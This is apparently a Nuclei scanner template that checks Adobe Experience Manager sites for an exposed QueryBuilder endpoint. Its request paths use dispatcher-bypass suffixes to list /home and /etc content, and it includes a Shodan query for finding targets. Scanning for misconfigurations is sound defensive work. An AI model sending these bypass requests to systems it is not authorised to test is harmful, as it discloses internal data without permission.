id: aem-querybuilder-internal-path-read

info:
  name: AEM QueryBuilder Internal Path Read
  author: DhiyaneshDk
  severity: medium
  reference:
    - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
  metadata:
    max-request: 4
    shodan-query: http.component:"Adobe Experience Manager"
  tags: aem,misconfig

http:
  - method: GET
    path:
      - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
      - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
      - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
      - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - 'jcr:path'
          - 'success'
        condition: and

# digest: 4a0a00473045022036a84c77fa98147a44845f1a12d95b4757094f2b4d956d3a14a1ae363b861e550221008e10cb2f1ce0993c3efc76bffcbbde1d3235cb843acf1710de4d763277f4f12b:922c64590222798bb761d5b6d8e72950
